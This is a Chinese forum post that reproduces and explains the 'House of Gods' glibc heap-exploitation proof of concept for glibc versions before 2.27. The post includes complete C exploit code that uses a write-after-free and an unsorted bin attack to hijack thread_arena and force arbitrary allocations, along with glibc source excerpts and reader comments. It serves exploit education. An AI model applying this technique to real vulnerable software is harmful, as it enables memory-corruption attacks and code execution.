R00tkit 发表于 2023-10-27 21:26

house of gods

本帖最后由 R00tkit 于 2023-10-28 07:56 编辑


# house_of_gods

`glibc < 2.27`,这是一个比较有趣的利用手法。按 `house of gods` 搜索没有搜到网上对这个手法的讲解,之前的 how2heap 系列加上这个就齐了。

## 源码

```cpp
/* House of Gods PoC */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <inttypes.h>

/*
* Welcome to the House of Gods...
*
* House of Gods is an arena hijacking technique for glibc < 2.27. It supplies
* the attacker with an arbitrary write against the thread_arena symbol of
* the main thread. This can be used to replace the main_arena with a
* carefully crafted fake arena. The exploit was tested against
*
*   - glibc-2.23
*   - glibc-2.24
*   - glibc-2.25
*   - glibc-2.26
*
* Following requirements are mandatory
*
*   - 8 allocs of arbitrary size to hijack the arena (+2 for ACE)
*   - control over first 5 quadwords of a chunk's userdata
*   - a single write-after-free bug on an unsorted chunk
*   - heap address leak + libc address leak
*
* This PoC demonstrates how to leverage the House of Gods in order to hijack
* the thread_arena. But it wont explain how to escalate further to
* arbitrary code execution, since this step is trivial once the whole arena
* is under control.
*
* Also note, that the how2heap PoC might use more allocations than
* previously stated. This is intentional and has educational purposes.
*
* If you want to read the full technical description of this technique, going
* from zero to arbitrary code execution within only 10 to 11 allocations, here
* is the original document I've written
*
*   https://github.com/Milo-D/house-of-gods/blob/master/rev2/HOUSE_OF_GODS.TXT
*
* I recommend reading this document while experimenting with
* the how2heap PoC.
*
* Besides that, this technique abuses a minor bug in glibc, which I have
* already submitted to bugzilla at
*
*   https://sourceware.org/bugzilla/show_bug.cgi?id=29709
*
* AUTHOR: David Milosevic (milo)
*
* */

/* <--- Exploit PoC ---> */

int main(void) {

    printf("=================\n");
    printf("= House of Gods =\n");
    printf("=================\n\n");

    printf("=== Abstract ===\n\n");

    printf("The core of this technique is to allocate a fakechunk overlapping\n");
    printf("the binmap field within the main_arena. This fakechunk is located at\n");
    printf("offset 0x850. Its sizefield can be crafted by carefully binning chunks\n");
    printf("into smallbins or largebins. The binmap-chunk is then being linked into\n");
    printf("the unsorted bin via a write-after-free bug in order to allocate it back\n");
    printf("as an exact fit. One can now tamper with the main_arena.next pointer at\n");
    printf("offset 0x868 and inject the address of a fake arena. A final unsorted bin\n");
    printf("attack corrupts the narenas variable with a very large value. From there, only\n");
    printf("two more allocation requests for at least 0xffffffffffffffc0 bytes of memory\n");
    printf("are needed to trigger two consecutive calls to the reused_arena() function,\n");
    printf("which in turn traverses the corrupted arena-list and sets thread_arena to the\n");
    printf("address stored in main_arena.next - the address of the fake arena.\n\n");

    printf("=== PoC ===\n\n");

    printf("Okay, so let us start by allocating some chunks...\n\n");

    /*
   * allocate a smallchunk, for example a 0x90-chunk.
   * */
    void *SMALLCHUNK = malloc(0x88);

    /*
   * allocate the first fastchunk. We will use
   * a 0x20-chunk for this purpose.
   * */
    void *FAST20 = malloc(0x18);

    /*
   * allocate a second fastchunk. This time
   * a 0x40-chunk.
   * */
    void *FAST40 = malloc(0x38);

    printf("%p is our 0x90-sized smallchunk. We will bin this chunk to forge a\n", SMALLCHUNK);
    printf("fake sizefield for our binmap-chunk.\n\n");

    printf("%p is our first fastchunk. Its size is 0x20.\n\n", FAST20);

    printf("%p is our second fastchunk with a size of 0x40. The usecase of\n", FAST40);
    printf("both fastchunks will be explained later in this PoC.\n\n");

    printf("We can move our smallchunk to the unsorted bin by simply free'ing it...\n\n");

    /*
   * put SMALLCHUNK into the unsorted bin.
   * */
    free(SMALLCHUNK);

    /*
   * this is a great opportunity to simulate a
   * libc leak. We just read the address of the
   * unsorted bin and save it for later.
   * */
    const uint64_t leak = *((uint64_t*) SMALLCHUNK);

    printf("And now we need to make a request for a chunk which can not be serviced by\n");
    printf("our recently free'd smallchunk. Thus, we will make a request for a\n");
    printf("0xa0-sized chunk - let us call this chunk INTM (intermediate).\n\n");

    /*
   * following allocation will trigger a binning
   * process within the unsorted bin and move
   * SMALLCHUNK to the 0x90-smallbin.
   * */
    void *INTM = malloc(0x98);

    printf("Our smallchunk should be now in the 0x90-smallbin. This process also triggered\n");
    printf("the mark_bin(m, i) macro within the malloc source code. If you inspect the\n");
    printf("main_arena's binmap located at offset 0x855, you will notice that the initial\n");
    printf("value of the binmap changed from 0x0 to 0x200 - which can be used as a valid\n");
    printf("sizefield to bypass the unsorted bin checks.\n\n");

    printf("We would also need a valid bk pointer in order to bypass the partial unlinking\n");
    printf("procedure within the unsorted bin. But luckily, the main_arena.next pointer at\n");
    printf("offset 0x868 points initially to the start of the main_arena itself. This fact\n");
    printf("makes it possible to pass the partial unlinking without segfaulting.\n\n");

    printf("So now that we have crafted our binmap-chunk, it is time to allocate it\n");
    printf("from the unsorted bin. For that, we will abuse a write-after-free bug\n");
    printf("on an unsorted chunk. Let us start...\n\n");

    printf("First, allocate another smallchunk...\n");

    /*
   * recycle our previously binned smallchunk.
   * Note that, it is not neccessary to recycle this
   * chunk. I am doing it only to keep the heap layout
   * small and compact.
   * */
    SMALLCHUNK = malloc(0x88);

    printf("...and now move our new chunk to the unsorted bin...\n");

    /*
   * put SMALLCHUNK into the unsorted bin.
   * */
    free(SMALLCHUNK);

    printf("...in order to tamper with the free'd chunk's bk pointer.\n\n");

    /*
   * bug: a single write-after-free bug on an
   * unsorted chunk is enough to initiate the
   * House of Gods technique.
   * */
    *((uint64_t*) (SMALLCHUNK + 0x8)) = leak + 0x7f8;

    printf("Great. We have redirected the unsorted bin to our binmap-chunk.\n");
    printf("But we also have corrupted the bin. Let's fix this, by redirecting\n");
    printf("a second time.\n\n");

    printf("The next chunk (head->bk->bk->bk) in the unsorted bin is located at the start\n");
    printf("of the main-arena. We will abuse this fact and free a 0x20-chunk and a 0x40-chunk\n");
    printf("in order to forge a valid sizefield and bk pointer. We will also let the 0x40-chunk\n");
    printf("point to another allocated chunk (INTM) by writing to its bk pointer before\n");
    printf("actually free'ing it.\n\n");

    /*
   * before free'ing those chunks, let us write
   * the address of another chunk to the currently
   * unused bk pointer of FAST40. We can reuse
   * the previously requested INTM chunk for that.
   *
   * Free'ing FAST40 wont reset the bk pointer, thus
   * we can let it point to an allocated chunk while
   * having it stored in one of the fastbins.
   *
   * The reason behind this, is the simple fact that
   * we will need to perform an unsorted bin attack later.
   * And we can not request a 0x40-chunk to trigger the
   * partial unlinking, since a 0x40 request will be serviced
   * from the fastbins instead of the unsorted bin.
   * */
    *((uint64_t*) (FAST40 + 0x8)) = (uint64_t) (INTM - 0x10);

    /*
   * and now free the 0x20-chunk in order to forge a sizefield.
   * */
    free(FAST20);

    /*
   * and the 0x40-chunk in order to forge a bk pointer.
   * */
    free(FAST40);

    printf("Okay. The unsorted bin should now look like this\n\n");

    printf("head -> SMALLCHUNK -> binmap -> main-arena -> FAST40 -> INTM\n");
    printf("   bk            bk      bk            bk      bk\n\n");

    printf("The binmap attack is nearly done. The only thing left to do, is\n");
    printf("to make a request for a size that matches the binmap-chunk's sizefield.\n\n");

    /*
   * all the hard work finally pays off...we can
   * now allocate the binmap-chunk from the unsorted bin.
   * */
    void *BINMAP = malloc(0x1f8);

    printf("After allocating the binmap-chunk, the unsorted bin should look similar to this\n\n");

    printf("head -> main-arena -> FAST40 -> INTM\n");
    printf("   bk            bk      bk\n\n");

    printf("And that is a binmap attack. We've successfully gained control over a small\n");
    printf("number of fields within the main-arena. Two of them are crucial for\n");
    printf("the House of Gods technique\n\n");

    printf("    -> main_arena.next\n");
    printf("    -> main_arena.system_mem\n\n");

    printf("By tampering with the main_arena.next field, we can manipulate the arena's\n");
    printf("linked list and insert the address of a fake arena. Once this is done,\n");
    printf("we can trigger two calls to malloc's reused_arena() function.\n\n");

    printf("The purpose of the reused_arena() function is to return a non-corrupted,\n");
    printf("non-locked arena from the arena linked list in case that the current\n");
    printf("arena could not handle previous allocation request.\n\n");

    printf("The first call to reused_arena() will traverse the linked list and return\n");
    printf("a pointer to the current main-arena.\n\n");

    printf("The second call to reused_arena() will traverse the linked list and return\n");
    printf("a pointer to the previously injected fake arena (main_arena.next).\n\n");

    printf("We can reach the reused_arena() if we meet following conditions\n\n");

    printf("    - exceeding the total amount of arenas a process can have.\n");
    printf("      malloc keeps track by using the narenas variable as\n");
    printf("      an arena counter. If this counter exceeds the limit (narenas_limit),\n");
    printf("      it will start to reuse existing arenas from the arena list instead\n");
    printf("      of creating new ones. Luckily, we can set narenas to a very large\n");
    printf("      value by performing an unsorted bin attack against it.\n\n");

    printf("    - force the malloc algorithm to ditch the current arena.\n");
    printf("      When malloc notices a failure it will start a second allocation\n");
    printf("      attempt with a different arena. We can mimic an allocation failure by\n");
    printf("      simply requesting too much memory i.e. 0xffffffffffffffc0 and greater.\n\n");

    printf("Let us start with the unsorted bin attack. We load the address of narenas\n");
    printf("minus 0x10 into the bk pointer of the currently allocated INTM chunk...\n\n");

    /*
   * set INTM's bk to narenas-0x10. This will
   * be our target for the unsorted bin attack.
   * */
    *((uint64_t*) (INTM + 0x8)) = leak - 0xa40;

    printf("...and then manipulate the main_arena.system_mem field in order to pass the\n");
    printf("size sanity checks for the chunk overlapping the main-arena.\n\n");

    /*
   * this way we can abuse a heap pointer
   * as a valid sizefield.
   * */
    *((uint64_t*) (BINMAP + 0x20)) = 0xffffffffffffffff;

    printf("The unsorted bin should now look like this\n\n");

    printf("head -> main-arena -> FAST40 -> INTM -> narenas-0x10\n");
    printf("   bk            bk      bk      bk\n\n");

    printf("We can now trigger the unsorted bin attack by requesting the\n");
    printf("INTM chunk as an exact fit.\n\n");

    /*
   * request the INTM chunk from the unsorted bin
   * in order to trigger a partial unlinking between
   * head and narenas-0x10.
   * */
    INTM = malloc(0x98);

    printf("Perfect. narenas is now set to the address of the unsorted bin's head\n");
    printf("which should be large enough to exceed the existing arena limit.\n\n");

    printf("Let's proceed with the manipulation of the main_arena.next pointer\n");
    printf("within our previously allocated binmap-chunk. The address we write\n");
    printf("to this field will become the future value of thread_arena.\n\n");

    /*
   * set main_arena.next to an arbitrary address. The
   * next two calls to malloc will overwrite thread_arena
   * with the same address. I'll reuse INTM as fake arena.
   *
   * Note, that INTM is not suitable as fake arena but
   * nevertheless, it is an easy way to demonstrate that
   * we are able to set thread_arena to an arbitrary address.
   * */
    *((uint64_t*) (BINMAP + 0x8)) = (uint64_t) (INTM - 0x10);

    printf("Done. Now all what's left to do is to trigger two calls to the reused_arena()\n");
    printf("function by making two requests for an invalid chunksize.\n\n");

    /*
   * the first call will force the reused_arena()
   * function to set thread_arena to the address of
   * the current main-arena.
   * */
    malloc(0xffffffffffffffbf + 1);

    /*
   * the second call will force the reused_arena()
   * function to set thread_arena to the address stored
   * in main_arena.next - our fake arena.
   * */
    malloc(0xffffffffffffffbf + 1);

    printf("We did it. We hijacked the thread_arena symbol and from now on memory\n");
    printf("requests will be serviced by our fake arena. Let's check this out\n");
    printf("by allocating a fakechunk on the stack from one of the fastbins\n");
    printf("of our new fake arena.\n\n");

    /*
   * construct a 0x70-fakechunk on the stack...
   * */
    uint64_t fakechunk = {

      0x0000000000000000, 0x0000000000000073,
      0x4141414141414141, 0x0000000000000000
    };

    /*
   * ...and place it in the 0x70-fastbin of our fake arena
   * */
    *((uint64_t*) (INTM + 0x20)) = (uint64_t) (fakechunk);

    printf("Fakechunk in position at stack address %p\n", fakechunk);
    printf("Target data within the fakechunk at address %p\n", &fakechunk);
    printf("Its current value is %#lx\n\n", fakechunk);

    printf("And after requesting a 0x70-chunk...\n");

    /*
   * use the fake arena to perform arbitrary allocations
   * */
    void *FAKECHUNK = malloc(0x68);

    printf("...malloc returns us the fakechunk at %p\n\n", FAKECHUNK);

    printf("Overwriting the newly allocated chunk changes the target\n");
    printf("data as well: ");

    /*
   * overwriting the target data
   * */
    *((uint64_t*) (FAKECHUNK)) = 0x4242424242424242;

    printf("%#lx\n", fakechunk);

    /*
   * confirm success
   * */
    assert(fakechunk == 0x4242424242424242);

    return EXIT_SUCCESS;
}

```

## 前置知识

先了解一下 `binmap` 的用处。

```cpp
    struct malloc_state
    {
      [...]

      /* Bitmap of bins */
      unsigned int binmap;

      /* Linked list */
      struct malloc_state *next;

      /* Linked list for free arenas.Access to this field is serialized
         by free_list_lock in arena.c.*/
      struct malloc_state *next_free;

      /* Number of threads attached to this arena.0 if the arena is on
         the free list.Access to this field is serialized by
         free_list_lock in arena.c.*/
      INTERNAL_SIZE_T attached_threads;

      /* Memory allocated from the system in this arena.*/
      INTERNAL_SIZE_T system_mem;
      INTERNAL_SIZE_T max_system_mem;
    };
```

`binmap` 在 `malloc` 过程中的下面两个场景会被修改:

1. 在遍历 `unsorted bin` 中的空闲 `chunk` 时如果将该 `chunk` 放入对应的 `small bin` 或 `large bin` 中会在 `binmap` 对应位置置位。

```cpp
mark_bin(av, victim_index);
#define mark_bin(m, i) ((m)->binmap |= idx2bit(i))
```

2. 在遍历 `small bin + large bin` 找大小不小于当前 `chunk` 的空闲 `chunk` 时如果对应 `binmap` 置位的 `bin` 是空闲的就将对应位置复位。

```cpp
av->binmap = map &= ~bit;
```

## 调试

首先申请依次申请 `SMALLCHUNK_0x90, FASTCHUNK_0x20, FASTCHUNK_0x40`,然后将 `SMALLCHUNK_0x90` 释放到 `unsorted bin` 中。



然后申请 `SMALLCHUNK_0xa0(INTM)`,这时候会触发第一个改变 `binmap` 的条件,会将 `binmap` 改为 `0x200`,我们将其作为`fake_chunk_size`,暂且叫包含 `binmap` 的 `fake_chunk` 叫 `BINMAP`。并将 `SMALLCHUNK_0x90` 放进 `small_bin_0x90` 的位置上。





然后重新申请 `SMALLCHUNK_0x90`,再将其释放到 `unsorted_bin` 中。利用 `UAF` 漏洞将其 `SMALLCHUNK_0x90.bk->&main_arena.bins`,也就是 `fake_chunk_prevsize`。 再将 `FASTCHUNK_0x40.bk->(SMALLCHUNK_0xa0)INTM`,然后释放 `FASTBIN_0x20, FASTBIN_0x40`。其中 `FASTBIN_0x20` 正好位于 `main_arena_size`的位置,其作用是确保 `main_arena` 所在的 `fake chunk` 的 `size` 大于 `2 * SIZE_SZ` 此时 `unsorted bin` 结构如下。

_(因为 `binmap` 数组是 `uint` 类型是 `4` 字节大小,所以 `fake_chunk_binmap.bk == next` ,`next` 指针指向 `&main_arena`)_

`head.bk -> SMALLCHUNK_0x90.bk -> BINMAP.bk -> main-arena.bk -> FASTCHUNK_0x40.bk -> INTM`



此时申请 `0x1f8` 大小的 `chunk` 将会把正好合适的 `BINMAP` 申请出来。之后我们考虑通过如何把 `arena` 切换到 伪造的 `arena` 上。在 `__libc_malloc` 上,我们通过 `arena_get` 来获取 `arena` 。由于 `arena` 的 `flags` 的值一般为 `0` ,因此将宏展开后发现实际上是获取的 `thread_arena` 的值。

```cpp
#define arena_get(ptr, size)   \
    do {                     \
      ptr = thread_arena;    \
      arena_lock(ptr, size); \
    } while (0)
```

在 `arena_get` 获取 `arena` 后会调用 `_int_malloc` 尝试申请内存,如果 `_int_malloc` 返回 `NULL` 则调用 `arena_get_retry` 和 `_int_malloc` 尝试再次分配内存。

```cpp
    arena_get(ar_ptr, bytes);

    victim = _int_malloc(ar_ptr, bytes);
    /* Retry with another arena only if we were able to find a usable arena
       before.*/
    if (!victim && ar_ptr != NULL) {
      LIBC_PROBE(memory_malloc_retry, 1, bytes);
      ar_ptr = arena_get_retry(ar_ptr, bytes);
      victim = _int_malloc(ar_ptr, bytes);
    }
```

由于 `arena` 为 `main_arena` ,因此实际上调用的是 `arena_get2` 。

```cpp
static mstate
arena_get_retry(mstate ar_ptr, size_t bytes) {
    LIBC_PROBE(memory_arena_retry, 2, bytes, ar_ptr);
    if (ar_ptr != &main_arena) {
      ...
    } else {
      (void) mutex_unlock(&ar_ptr->mutex);
      ar_ptr = arena_get2(bytes, ar_ptr);
    }

    return ar_ptr;
}
```

在 `arena_get2` 函数中,如果 `n <= narenas_limit - 1` 则调用 `_int_new_arena` 创建一个新的 `arena` 。否则调用 `reused_arena` 从现有的 `arena` 中找一个可用的 `arena`。

```cpp
static mstate internal_function arena_get2(size_t size, mstate avoid_arena) {
    mstate a;

    static size_t narenas_limit;

    a = get_free_list(); // 调试发现返回 NULL
    if (a == NULL) {
      /* Nothing immediately available, so generate a new arena.*/
      if (narenas_limit == 0) {
            if (mp_.arena_max != 0)
                narenas_limit = mp_.arena_max;
            else if (narenas > mp_.arena_test) {
                int n = __get_nprocs();

                if (n >= 1)
                  narenas_limit = NARENAS_FROM_NCORES(n);
                else
                  /* We have no information about the system.Assume two
                   cores.*/
                  narenas_limit = NARENAS_FROM_NCORES(2);
            }
      }
    repeat:;
      size_t n = narenas;
      /* NB: the following depends on the fact that (size_t)0 - 1 is a
         very large number and that the underflow is OK.If arena_max
         is set the value of arena_test is irrelevant.If arena_test
         is set but narenas is not yet larger or equal to arena_test
         narenas_limit is 0.There is no possibility for narenas to
         be too big for the test to always fail since there is not
         enough address space to create that many arenas.*/
      if (__glibc_unlikely(n <= narenas_limit - 1)) {
            if (catomic_compare_and_exchange_bool_acq(&narenas, n + 1, n))
                goto repeat;
            a = _int_new_arena(size);
            if (__glibc_unlikely(a == NULL))
                catomic_decrement(&narenas);
      } else
            a = reused_arena(avoid_arena);
    }
    return a;
}
```

`reused_arena` 从 `next_to_use` 开始沿 `arena.next` 链表找第一个满足 `!arena_is_corrupt(result) && !mutex_trylock(&result->mutex)` 的 `arena` ,并且会将找到的 `arena` 赋值给 `thread_arena` ,然后更新 `next_to_use` 为下一个 `arena` 。

```cpp
static size_t narenas = 1;
static mstate
reused_arena(mstate avoid_arena) {
    mstate result;
    /* FIXME: Access to next_to_use suffers from data races.*/
    static mstate next_to_use;
    if (next_to_use == NULL)
      next_to_use = &main_arena;

    /* Iterate over all arenas (including those linked from
   free_list).*/
    result = next_to_use;
    do {
      if (!arena_is_corrupt(result) && !mutex_trylock(&result->mutex))
            goto out;

      /* FIXME: This is a data race, see _int_new_arena.*/
      result = result->next;
    } while (result != next_to_use);

    ...
out:
    ...
    thread_arena = result;
    next_to_use = result->next;

    return result;
}
```

因此我们可以修改 `main_arena.next` 指向伪造的 `arena` 然后两次调用 `malloc(0xffffffffffffffbf + 1)`,(第一次调用`result==&main_arena;next_to_use==INTM`); 通过 `checked_request2size(bytes, nb);` 宏使得 `_int_malloc` 返回 `NULL`,最终使得 `thread_arena` 指向我们伪造的 `arena` 。

首先需要确保 `narenas > narenas_limit - 1` 从而调用 `reused_arena` ,因此要构造 `unsorted bin attack` 将 `narenas` 改成一个较大的数。为了确保从 `unsorted bin` 中取出的 `chunk` 能通过 `victim->size > av->system_mem` 检查,我们将 `main_arena.system_mem` 赋值为` 0xffffffffffffffff` 。将 `INTM.bk` 指向 `&narenas - 0x10` 构造 `unsorted bin attack `。







申请 `0xa0` 大小的 `chunk` (申请被构造在 `unsorted bin` 的 `INTM`)触发 `unsorted bin attack`。此时 `arenas` 上被写入了 `&main_arena.top` 。



将 `main_arena.next` 指向 `INTM` ,连续两次 `malloc(0xffffffffffffffbf + 1);` 将 `thread_arena` 指向我们伪造的 `INTM` 。



伪造如下 `fast_chunk`



之后将 `(uint64_t) (INTM_prev+0x30)` 指向伪造的 `chunk` 。



此时如果 `malloc(0x68)` 就会将目标地址处的内存申请出来。



binarystudy123 发表于 2023-10-28 15:05

正在学习各种house of,长知识了

中原一点红 发表于 2023-10-28 21:42

辛苦啦,支持下
{:17_1077:}

petroyf 发表于 2023-10-30 16:36

不明觉厉!

tl;dr 发表于 2023-10-31 17:59

页: [1]
查看完整版本: house of gods